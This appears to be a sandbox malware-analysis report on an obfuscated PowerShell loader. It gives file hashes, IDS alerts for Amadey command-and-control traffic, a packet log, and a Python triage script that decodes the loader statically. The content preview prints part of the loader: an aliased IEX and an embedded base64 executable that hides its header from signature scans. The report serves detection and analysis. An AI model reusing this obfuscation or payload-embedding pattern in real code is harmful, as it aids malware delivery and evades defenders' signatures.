                                                  SHA-512:EB4680C02DF9A04A814DB801642EC659C061E16A362C4B30FB1EFA2A21E79FD35308DBA0468DF1C598EE6C89C070AE1F26CBAD20BC93A46A8365B7F81B4C9EE0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666644" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11608
                                                  Entropy (8bit):4.890472898059848
                                                  Encrypted:false
                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                  MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                  SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                  SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                  SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.738168188574685
                                                  Encrypted:false
                                                  SSDEEP:96:8odKU33CxHu5kvhkvCCt/xP5AH4xP5BHy:roUyO1/x9xy
                                                  MD5:2075D1AA710C95D624389E253E94275A
                                                  SHA1:E00250325274EF97A44745BE74160D8ADC68F564
                                                  SHA-256:6E07543A65679631EAE5328C4D629CBEA44A547CED1AC8AF8B13E02CD6678ECF
                                                  SHA-512:6CEA3D8CD9C62E11A9BD8003074242E1586639F159CAE1FF0A736731F536CB0198D1C20A6882FF485F11799FB6B40A238476982D727F1E31AAABB14AA882D791
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....K...a..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....[..a......a......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z6=...........................%..A.p.p.D.a.t.a...B.V.1.....(Z9=..Roaming.@......CW.^(Z9=...........................oY.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^(Z<=....Q...........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.738168188574685
                                                  Encrypted:false
                                                  SSDEEP:96:8odKU33CxHu5kvhkvCCt/xP5AH4xP5BHy:roUyO1/x9xy
                                                  MD5:2075D1AA710C95D624389E253E94275A
                                                  SHA1:E00250325274EF97A44745BE74160D8ADC68F564
                                                  SHA-256:6E07543A65679631EAE5328C4D629CBEA44A547CED1AC8AF8B13E02CD6678ECF
                                                  SHA-512:6CEA3D8CD9C62E11A9BD8003074242E1586639F159CAE1FF0A736731F536CB0198D1C20A6882FF485F11799FB6B40A238476982D727F1E31AAABB14AA882D791
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....K...a..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....[..a......a......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z6=...........................%..A.p.p.D.a.t.a...B.V.1.....(Z9=..Roaming.@......CW.^(Z9=...........................oY.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^(Z<=....Q...........
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.4662657290209005
                                                  Encrypted:false
                                                  SSDEEP:6144:xIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSb+:SXD94zWlLZMM6YFHc++
                                                  MD5:44EEC2B1FA90433ECAD10BCCE93A0EBE
                                                  SHA1:543480413B9D4E2509E867A7A97374112E8088AF
                                                  SHA-256:B0F7E33183E17EAB89DB7A006773BAB481BFCB05E629E0BD8609822E9C35E77D
                                                  SHA-512:90EB5F2F3FB09E165028DB6F8CD2ADA032D6DF63EFDF03ED0411654DF757E2493DAA5574F6C32987A77EE9D585C4A97CEDD67B2449FAB2F61D8F8F48507D6593
                                                  Malicious:false
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..6.a................................................................................................................................................................................................................................................................................................................................................!.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                                  Entropy (8bit):5.378033187505597
                                                  TrID:
                                                    File name:nYT1CaXH9N.ps1
                                                    File size:698'189 bytes
                                                    MD5:ab733235a722c734fb8f19160825cef1
                                                    SHA1:162b73031c52d7356337479488d60c333f404fdd
                                                    SHA256:32e6d8538c6b1d47942918cef259a80e70f06feb0145d6e41d44ec5917435391
                                                    SHA512:64a26e92c00a7a61acf71fdf819874ef6ce976117ddcaa0bea5ea3d57e2c631ff5569fdea081c6a39c73aa3ae40b0c08a049d7233c2a7e94232543cb1c4e67f6
                                                    SSDEEP:12288:yfytehPmbJEW2WkiUHJcWzMkVjkMAkZZ7wyzDFBagP:5yWKV5jkUZUyzSgP
                                                    TLSH:0DE47C3A8117BEBE3A2E3E8C50083D451C586ED75768D658EFC89536B2DA280DE7C4F4
                                                    File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE
                                                    Icon Hash:3270d6baae77db44
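The File Content Preview above shows the loader's opening statements: 'IQIQQIEX'.replace('IQIQQ','') evaluates to IEX, sal GG $t0 registers GG as an alias for it (sal is Set-Alias), and $OE receives a base64 string that matches the well-known encoding of a PE header with its first two characters, TV (the base64 form of MZ), missing, which defeats a literal search for TVqQAAMAAAAEAAAA. The Python below is an added triage example, not code from the report or from the sample: it resolves the replace/alias trick statically and tests whether the blob becomes a PE once TV is restored. The preview text is reconstructed from the line above with the report's dot-rendered line breaks replaced by CRLF; how the script later uses $OE is not visible on the page, so restoring TV is a hypothesis the code checks, not something the report states.

```python
import base64
import binascii
import re

# Reconstructed from the report's File Content Preview (constructed input):
# the preview renders line breaks as dots and cuts the base64 string short.
PREVIEW = (
    "ipconfig /flushdns\r\n"
    "$t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;\r\n"
    '$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE'
)

# $var='LITERAL'.replace('JUNK','')  -> the string the script actually builds
REPLACE_ASSIGN_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*'(?P<lit>[^']*)'\.replace\('(?P<junk>[^']*)',\s*''\)",
    re.IGNORECASE,
)
# sal NAME $var  (sal is PowerShell's built-in alias for Set-Alias)
SET_ALIAS_RE = re.compile(r"\bsal\s+(?P<alias>\w+)\s+\$(?P<var>\w+)", re.IGNORECASE)
# $var="BASE64..."  (payload container; the closing quote is beyond the preview)
B64_ASSIGN_RE = re.compile(r'\$(?P<var>\w+)\s*=\s*"(?P<b64>[A-Za-z0-9+/=]+)')


def resolve_string_vars(script):
    """Evaluate the 'literal'.replace('junk','') idiom without running PowerShell.
    .NET String.Replace is ordinal, so Python's case-sensitive replace matches."""
    return {
        m["var"]: m["lit"].replace(m["junk"], "")
        for m in REPLACE_ASSIGN_RE.finditer(script)
    }


def resolve_aliases(script):
    """Map aliases created with sal to the command they hide, e.g. GG -> IEX."""
    strings = resolve_string_vars(script)
    return {
        m["alias"]: strings.get(m["var"], "$" + m["var"])
        for m in SET_ALIAS_RE.finditer(script)
    }


def probe_decode(b64):
    """Decode only whole 4-character groups: enough to inspect leading bytes
    of a truncated blob without tripping on missing padding."""
    usable = b64[: len(b64) - len(b64) % 4]
    try:
        return base64.b64decode(usable)
    except binascii.Error:
        return b""


def pe_header_check(b64):
    """Is the blob a PE as-is, or only after the leading 'TV' is restored?

    Dropping 'TV' shifts the whole base64 stream by two characters, so the
    as-is decode yields garbage; prepending 'TV' realigns it. Whether the
    script itself re-adds the characters cannot be seen in the preview.
    """
    as_is = probe_decode(b64)
    restored = probe_decode("TV" + b64)
    return {
        "as_is_is_pe": as_is[:2] == b"MZ",
        "restored_is_pe": restored[:2] == b"MZ",
        "dos_stub_present": b"This program cannot be run in DOS mode" in restored,
    }


def triage(script):
    """Static first pass over a loader: hidden aliases plus PE-shaped blobs."""
    blobs = {m["var"]: m["b64"] for m in B64_ASSIGN_RE.finditer(script)}
    return {
        "aliases": resolve_aliases(script),
        "payload_vars": {var: pe_header_check(b64) for var, b64 in blobs.items()},
    }


if __name__ == "__main__":
    print(triage(PREVIEW))
```

The alias map tells you that every later GG(...) call in the script is Invoke-Expression; the header check tells you which variable carries the embedded executable and that a signature keyed on the base64 of "MZ" would not have fired on this file.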
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T08:42:05.045163+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49737 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:09.575045+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49740 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:14.191636+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49745 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:16.679476+0100 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.4 | 49748 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:18.914485+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49749 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:23.498611+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49751 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:28.049493+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49753 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:32.618665+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49755 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:37.175436+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49757 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:41.763864+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49759 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:46.302886+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55811 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:50.835270+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55813 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:55.381034+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55815 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:00.109511+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55838 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:04.628949+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55869 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:09.181141+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55897 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:13.708822+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55929 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:18.273842+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55961 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:22.831688+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 55988 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:27.388773+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56020 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:31.919921+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56051 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:36.481428+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56083 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:41.038224+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56100 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:45.574085+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56102 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:50.102710+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56104 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:54.672605+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56106 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:59.204325+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56108 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:03.754351+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56110 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:08.335762+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56112 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:12.906479+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56114 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:17.458560+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56116 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:22.035510+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56118 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:26.596671+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56120 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:31.162499+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56122 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:35.733585+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56124 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:40.266082+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56126 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:44.828367+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56128 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:49.376427+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56130 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:53.964871+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56132 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:58.568416+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56134 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:03.143637+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56136 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:07.716156+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56138 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:12.274753+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56140 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:16.834867+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56142 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:21.394060+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56144 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:25.968264+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56146 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:30.523002+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56148 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:35.080922+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56150 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:39.706832+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56152 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:44.265261+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56154 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:48.840371+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56156 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:53.412687+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56158 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:57.976589+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56160 | 176.113.115.131 | 80 | TCP
2025-01-08T08:46:02.527470+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 56162 | 176.113.115.131 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jan 8, 2025 08:42:47.941591024 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:48.624346018 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:48.624556065 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.135092020 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.135385990 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.140274048 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.140352011 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.140458107 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.140716076 CET8055812176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.140770912 CET5581280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:50.145225048 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.835179090 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:50.835269928 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.461291075 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.461633921 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.466624022 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:52.466710091 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.466824055 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.468065023 CET8055813176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:52.468123913 CET5581380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:52.471609116 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:53.154411077 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:53.154721022 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.664371967 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.664676905 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.669522047 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:54.669656992 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.669842958 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:54.674854040 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:54.677700043 CET8055814176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:54.677752018 CET5581480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:55.380978107 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:55.381033897 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.167953968 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.168278933 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.173060894 CET8055815176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.173079014 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.173140049 CET5581580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.173186064 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.173350096 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:57.178136110 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.863358021 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:57.863585949 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.398680925 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.399061918 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.403784037 CET8055822176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:59.403835058 CET5582280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.403847933 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:59.403906107 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.404030085 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:59.408792973 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:00.109401941 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:00.109510899 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.728663921 CET5583880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.728962898 CET5585480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:43:01.733776093 CET8055854176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:01.733803034 CET8055838176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:43:01.733865976 CET5585480192.168.2.4176.113.115.131
